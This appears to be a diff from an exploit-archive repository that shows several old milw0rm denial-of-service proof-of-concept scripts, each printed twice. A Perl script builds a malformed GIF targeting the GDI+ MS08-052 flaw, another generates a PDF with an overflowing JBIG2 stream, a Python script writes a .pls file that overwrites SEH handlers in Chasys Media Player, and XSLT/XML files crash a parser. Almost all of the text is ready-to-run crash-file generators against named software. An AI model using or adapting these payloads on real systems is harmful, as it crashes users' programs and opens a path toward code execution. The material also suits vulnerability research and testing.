"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#4
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
"\x00". # Terminator
"\x3B". # Trailer
open(out, "> crash.gif");
binmode(out);
print (out $gif);
close(out);
# milw0rm.com [2008-10-09]
------------------------------------------------------------------------------------------------------------
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================
#!/usr/bin/perl
#
use strict;
my $gif =
"\x47\x49\x46\x38\x39\x61". # GIF header
"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor
# COLOR Stream
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (1) Size: 21+1
#0
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#1
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC".
"\x21\xEC".
#2
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#3
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#4
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#5
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#6
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#7
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#8
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#9
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#10
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#11
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E".
"\x01\x5A".
"\x00". ## Terminator
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (2) Size: EC+1
#0
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#1
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#2
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#3
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#4
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
"\x00". # Terminator
"\x3B". # Trailer
open(out, "> crash.gif");
binmode(out);
print (out $gif);
close(out);
# milw0rm.com [2008-10-09]

180
platforms/windows/dos/8099.pl
View file

@ -1,90 +1,90 @@
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
" \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
" \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .
"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .
"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";
}
# milw0rm.com [2009-02-23]
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
" \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
" \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .
"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .
"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";
}
# milw0rm.com [2009-02-23]

40
platforms/windows/dos/8232.py
View file

@ -1,20 +1,20 @@
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print " Discovered By : zAx"
print " Contact : ThE-zAx@Hotmail.Com"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print " Discovered By : zAx"
print " Contact : ThE-zAx@Hotmail.Com"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]

86
platforms/windows/dos/8356.txt
View file

@ -1,43 +1,43 @@
-------------
by DATA_SNIPER
GREETZ TO THE FOUNDER ;)
fore more information and bug analyses:
http://www.at4re.com/f/showthread.php?p=47560
i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000]
so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit.
and the second code change the EAX to 017ED9A0.
xslt.xsl code EAX=00000031:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:for-each select="key('label', @item1)">
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
xslt.xsl code EAX=017ED9A0:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:value-of select="key('label', @item1)">
</xsl:value-of>
</xsl:template>
</xsl:stylesheet>
xmlcrash.xml code:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
http://www.w3.org/2001/XMLSchema-instance">
<item1 id="datasniper" />
</root>
# milw0rm.com [2009-04-06]
-------------
by DATA_SNIPER
GREETZ TO THE FOUNDER ;)
fore more information and bug analyses:
http://www.at4re.com/f/showthread.php?p=47560
i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000]
so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit.
and the second code change the EAX to 017ED9A0.
xslt.xsl code EAX=00000031:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:for-each select="key('label', @item1)">
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
xslt.xsl code EAX=017ED9A0:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:value-of select="key('label', @item1)">
</xsl:value-of>
</xsl:template>
</xsl:stylesheet>
xmlcrash.xml code:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
http://www.w3.org/2001/XMLSchema-instance">
<item1 id="datasniper" />
</root>
# milw0rm.com [2009-04-06]

46
platforms/windows/dos/8588.pl
View file

@ -1,23 +1,23 @@
#####################################################################################################
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
# Discovered by SirGod - www.mortal-team.net
# Error log :
#
# Logged at Friday, May 01, 2009 14:03:17
# FileVersion: 1.0.0.283
# ProductVersion: 1.0.0.0
# Exception Code: 0xC0000005
# Exception Addr: 0x001B:0x004317F0
# Exception Module: TraktorBeatport.exe
# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
# The memory could not be "read"
